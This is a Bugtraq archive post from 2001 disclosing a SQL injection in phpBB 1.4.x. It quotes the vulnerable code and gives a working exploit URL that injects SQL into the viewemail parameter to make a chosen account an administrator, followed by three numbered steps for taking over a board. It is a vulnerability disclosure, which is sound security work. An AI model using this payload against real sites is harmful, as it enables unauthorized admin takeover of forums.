Bugtraq mailing list archives
phpBB 1.4.0 bug leads to easy admin privileges
From: <kill-9 () modernhackers com>
Date: 3 Aug 2001 19:51:28 -0000
-New phpBB 1.4.x exploit phpBB, is an open source bulletin board created by the phpBB group. Version 1.4.x of phpBB has a variable input validation problem that can lead to limited arbitrary sql querys including gaining administrative access to the board. The problem lies in the fact that phpBB 1.4.x includes an algorithm in the auth.php file which removes backslashes that php automatically adds to GPC (Get/Post/Cookie) variables. <Example code from auth.php> if(get_magic_quotes_gpc() == 1) { switch($REQUEST_METHOD){ case "POST": while (list ($key, $val) = each ($HTTP_POST_VARS)){ if( is_array($val) ){ array_walk($val, 'stripslashes_array', ''); $$key = $val;} else{ $$key = stripslashes($val);} } break; </ End example code> Therefore, certian php variables submitted through a URL can reach an sql query with unescaped quotes, which is not good for security reasons. In the prefs.php file such a situation exists where a user can execute an arbitrary query by supplying an certian value for the $viewemail variable. < Example sql query in prefs.php > $sql = "UPDATE users SET user_viewemail='$viewemail', user_theme='$themes', user_attachsig = '$sig', user_desmile = '$smile', user_html = '$dishtml', user_bbcode = '$disbbcode', user_lang = '$lang' WHERE (user_id = '$userdata[user_id]')"; </ End example code > Example URL gives a username "l337h4x0r" level 4 (administrative) privileges the board: <Example URL> http://sitename/phpBBfolder/prefs.php?save=1 &viewemail=1',user_level%3D'4'%20where% 20username%3D'l337h4x0r'%23 </ End example URL> Summary: 1. Register an account on a phpBB board version 1.4.x . 2. Enter above URL with the correct sitename and replace l337h4x0r with your username. 3. Click on "Administration Panel" near the bottom of the page. found by: kill-9 () modernhacker com http://www.modernhacker.com
Current thread:
- phpBB 1.4.0 bug leads to easy admin privileges kill-9 (Aug 03)
- Re: phpBB 1.4.0 bug leads to easy admin privileges Paul Burney (Aug 03)
- Re: phpBB 1.4.0 bug leads to easy admin privileges Joao Gouveia (Aug 06)
- <Possible follow-ups>
- Re: phpBB 1.4.0 bug leads to easy admin privileges Kaneda Akira (Aug 08)